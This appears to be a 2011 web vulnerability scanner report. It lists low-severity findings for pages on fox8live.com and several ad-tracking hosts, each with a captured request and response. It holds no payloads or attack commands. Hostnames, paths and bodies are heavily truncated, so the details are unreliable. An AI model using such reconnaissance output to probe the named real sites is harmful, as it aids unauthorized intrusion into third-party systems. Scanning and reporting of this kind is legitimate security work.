GET /business/story/McDonalds Host: mobile.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:13 GMT Content-Length: 6596 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /default.aspx |
GET /default.aspx HTTP/1.1 Host: mobile.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:00 GMT Content-Length: 5862 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2NTE4MTM1 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /news/local/story/Bonnet |
GET /news/local/story/Bonnet Host: mobile.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:05 GMT Content-Length: 10811 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /news/local/story |
GET /news/local/story Host: mobile.fox8live.com Proxy-Connection: keep-alive Referer: http://mobile.fox8live User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:17 GMT Content-Length: 12654 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /sports/default.aspx |
GET /sports/default.aspx HTTP/1.1 Host: mobile.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:11 GMT Content-Length: 5996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3ODc0MDQ4 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /sports/story/Preds-try |
GET /sports/story/Preds-try Host: mobile.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:10 GMT Content-Length: 9179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /weather/default.aspx |
GET /weather/default.aspx HTTP/1.1 Host: mobile.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:42:07 GMT Content-Length: 9343 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NTk2NTQz ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /business/default.aspx |
GET /business/default.aspx HTTP/1.1 Host: www.fox8live.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:53 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:38:53 GMT Age: 0 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 28256 Connection: keep-alive Content-Length: 28256 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM5OTY3NjE3 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /business/iframe |
GET /business/iframe Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uts=12; __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:02 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=121 Expires: Mon, 09 May 2011 15:39:02 GMT Age: 1 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 5216 Connection: keep-alive Content-Length: 5216 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUy ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /business/iframe |
GET /business/iframe Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uts=12; __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:04 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:39:00 GMT Age: 4 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 5204 Connection: keep-alive Content-Length: 5204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUy ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /content/aboutus/default |
GET /content/aboutus/default Host: www.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:34 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=121 Expires: Mon, 09 May 2011 15:40:52 GMT Age: 43 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 29278 Connection: keep-alive Content-Length: 29278 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3Mjc5MTA3 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /content/news/lee_zurik |
GET /content/news/lee_zurik Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:44 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:41:05 GMT Age: 39 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 40317 Connection: keep-alive Content-Length: 40317 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ3NzI1NDU2 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /content/news/seregni |
GET /content/news/seregni Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:44 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:41:08 GMT Age: 36 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 43733 Connection: keep-alive Content-Length: 43733 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU4ODI2NDc4 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /content/news/watercooler |
GET /content/news/watercooler Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:41:27 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:43:27 GMT Age: 0 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 27624 Connection: keep-alive Content-Length: 27624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ3NzI1NDU2 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /default.aspx |
GET /default.aspx HTTP/1.1 Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:34 GMT Server: PWS/1.7.2.1 X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:40:50 GMT Age: 44 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 102042 Connection: keep-alive Content-Length: 102042 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2NTE4MTM1 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /entertainment/horoscopes |
GET /entertainment/horoscopes Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:41:34 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:43:33 GMT Age: 1 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 22933 Connection: keep-alive Content-Length: 22933 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /mostpopular/story/Bonnet |
GET /mostpopular/story/Bonnet Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:41:38 GMT Server: PWS/1.7.2.1 X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin) Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 57286 Connection: keep-alive Content-Length: 57286 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /news/local/story/St |
GET /news/local/story/St Host: www.fox8live.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: HitCount_f50e95bc-67af |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:42 GMT Server: PWS/1.7.2.1 X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin) Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 60505 Connection: keep-alive Content-Length: 60505 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMw ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /rss/default.aspx |
GET /rss/default.aspx HTTP/1.1 Host: www.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:43 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=120 Expires: Mon, 09 May 2011 15:41:02 GMT Age: 41 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 27462 Connection: keep-alive Content-Length: 27462 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTUyOTMwNjQx ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /widgets/serve.aspx |
GET /widgets/serve.aspx?wid Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:39 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=121 Expires: Mon, 09 May 2011 15:40:59 GMT Age: 41 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 9152 Connection: keep-alive Content-Length: 9152 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTExODg5NDk1 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /wireless/default.aspx |
GET /wireless/default.aspx HTTP/1.1 Host: www.fox8live.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:39 GMT Server: PWS/1.7.2.1 X-Px: ht iad-agg-n30.panthercdn Cache-Control: max-age=121 Expires: Mon, 09 May 2011 15:40:59 GMT Age: 41 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 20605 Connection: keep-alive Content-Length: 20605 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU0OTkwNzIz ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/rtset |
GET /bh/rtset?do=add&pid Host: bh.contextweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pb_rtb_ev=1:535495 |
HTTP/1.1 302 Moved Temporarily Server: Sun GlassFish Enterprise Server v2.1.1 CW-Server: cw-web80 Cache-Control: no-cache, no-store Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:40:05 GMT; Path=/ Set-Cookie: pb_rtb_ev=1:535495 Location: http://a8485bbedc1e828b9 Content-Type: text/html; charset=iso-8859-1 Content-Length: 0 Date: Mon, 09 May 2011 15:40:05 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" |
Severity: | Low |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rfw/bs.serving-sys.com |
GET /rfw/.a6edacbe47e169caa//9766/90645/BurstingPipe Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=F435B78AA |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Location: http://.a6edacbe47e169caa Content-Length: 0 Date: Mon, 09 May 2011 15:39:54 GMT Connection: close |
Severity: | Low |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /log/usatoday/debug |
GET /log/usatoday/debug?type Host: trc.taboolasyndication Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: taboola_user_id=d80f7856 |
HTTP/1.1 302 Found Date: Mon, 09 May 2011 15:37:09 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc Cache-Control: no-cache Pragma: no-cache Location: http://a2c78ad8ffbc313cb Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | Low |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /usatoday/log/2/available |
GET /usatoday/log/2/available Host: trc.taboolasyndication Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: taboola_session_id=v1 |
HTTP/1.1 302 Found Date: Mon, 09 May 2011 15:37:11 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc Cache-Control: no-cache Pragma: no-cache Location: http://a905ae88c4b0a573a Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | Low |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /usatoday/log/2/display |
GET /usatoday/log/2/display Host: trc.taboolasyndication Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: taboola_session_id=v1 |
HTTP/1.1 302 Found Date: Mon, 09 May 2011 15:37:17 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc Cache-Control: no-cache Pragma: no-cache Location: http://a4f0f843a2d4f4761 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | Low |
Confidence: | Certain |
Host: | http://trc.taboolasy |
Path: | /usatoday/log/2/visible |
